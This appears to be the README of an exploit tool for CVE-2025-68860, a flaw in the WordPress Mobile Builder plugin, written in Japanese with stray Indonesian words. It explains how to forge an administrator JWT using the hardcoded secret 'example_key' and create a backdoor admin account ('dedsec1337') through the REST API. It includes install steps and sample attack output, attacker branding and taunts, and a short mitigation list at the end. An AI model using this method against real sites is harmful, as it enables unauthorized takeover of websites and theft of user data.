
WordPress Mobile Builder プラグインを標的とする CVE-2025-68860 のエクスプロイトスクリプト。ハードコードされたシークレットを使用して偽造 JWT トークンを生成し、管理者として認証して REST API 経由で新しい管理者アカウントを作成します。
WordPress Mobile builder プラグイン バージョン 1.4.2 以下には、攻撃者がデフォルトのシークレット「example_key」を使用して有効な JWT トークンを作成し、管理者 (user_id=1) として認証できるようにする Broken Authentication(認証の欠陥)の脆弱性が存在します。このトークンを使用すると、攻撃者は新しい管理者アカウントを作成し、サイトを乗っ取ることができます。
CVE: CVE-2025-68860
原因: JWT にハードコードされたシークレットキー「example_key」を使用しており、十分な検証が行われないため。
脆弱性の箇所: Mobile builder プラグインの JWT 認証を処理するファイル (例: class-jwt-auth.php) は、デフォルト値 'example_key' を持つ JWT_SECRET 定数を使用します。このシークレットは設定から変更できないため、攻撃者は任意の user_id のトークンを作成できます。
影響: 攻撃者は user_id=1 (管理者) のトークンを作成し、REST API エンドポイントにアクセスして、管理者ロールの新しいユーザーを作成できます。
CVSS: High (スコア 8.8) - ネットワークベクトル、ユーザーの操作は不要。
スクリプトは、user_id: 1 (admin) dan secret "example_key". を含むペイロードで JWT トークンを作成します。
トークンは、/wp-json/wp/v2/users/ にアクセスして管理者アクセスを検証するために使用されます。
成功した場合、スクリプトは /wp-json/wp/v2/users に POST リクエストを送信し、ユーザー名 dedsec1337、パスワード admin、メールアドレス [email protected]、ロール administrator を持つ新しいユーザーを作成します。
出力には資格情報と API 応答が表示されます。
Python 3.6+
Library: requests, PyJWT, colorama
Target WordPress dengan plugin Mobile builder versi <= 1.4.2 yang aktif.
git clone https://github.com/username/CVE-2025-68860
cd CVE-2025-68860
pip install -r requirements.txt
╔═══════════════════════════════════════════════════════════════════╗
║ WordPress Mobile builder <= 1.4.2 Broken Authentication Exploit ║
║ CVE-2025-68860 Priority: HIGH ║
║ Dedsec Team Exploit ║
╚═══════════════════════════════════════════════════════════════════╝
Exploit by : Dedsec Team Exploit
Telegram : @DedsecTeam1337
GitHub : https://github.com/DedsecTeam-BlackHat
[INFO] CVE-2025-68860 // WordPress Mobile builder Broken Authentication
[INFO] All old exploits/settings are ignored, running this vector only.
Site URL (example: http://target.site): http://localhost/wordpress
[INFO] Generating JWT as admin (user_id=1)...
eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9...
--------------------------------------------------------------
[INFO] Testing JWT at /wp-json/wp/v2/users/me
[SUCCESS] JWT valid! Confirmed admin access.
--------------------------------------------------------------
[INFO] Creating admin account using exploit...
[INFO] Exploiting, please wait...
[SUCCESS] ✅ Admin user created successfully!
==============[ New Admin Credentials ]==============
Username : dedsec1337
Password : admin
Email : [email protected]
===================================================
Full API response:
{
"id": 3,
"username": "dedsec1337",
"name": "dedsec1337",
"email": "[email protected]",
"roles": ["administrator"]
}
--------------------------------------------------------------
[SUCCESS] Exploit finished. Enjoy your shell.
...
攻撃者は新しい管理者アカウントを作成し、WordPress のすべての機能にアクセスし、悪意のあるプラグインをインストールし、コンテンツを変更し、ユーザーデータを盗み、あるいはサイトをさらなる攻撃に利用することができます。
この脆弱性は、事前の認証なしにリモートから悪用される可能性があります。
影響: WordPress サイトの完全な侵害。
Mobile builder プラグインを最新バージョン (>=1.4.3) に直ちに更新してください。
更新がない場合は、プラグインを一時的に無効にしてください。
サイトに不審なユーザーがいないか確認してください。
Web アプリケーションファイアウォール (WAF) を使用して、REST API エンドポイントへの不審なリクエストをブロックしてください。
暫定措置として、プラグインのコード内のシークレットキーを変更し (可能な場合)、REST API へのアクセスを制限してください。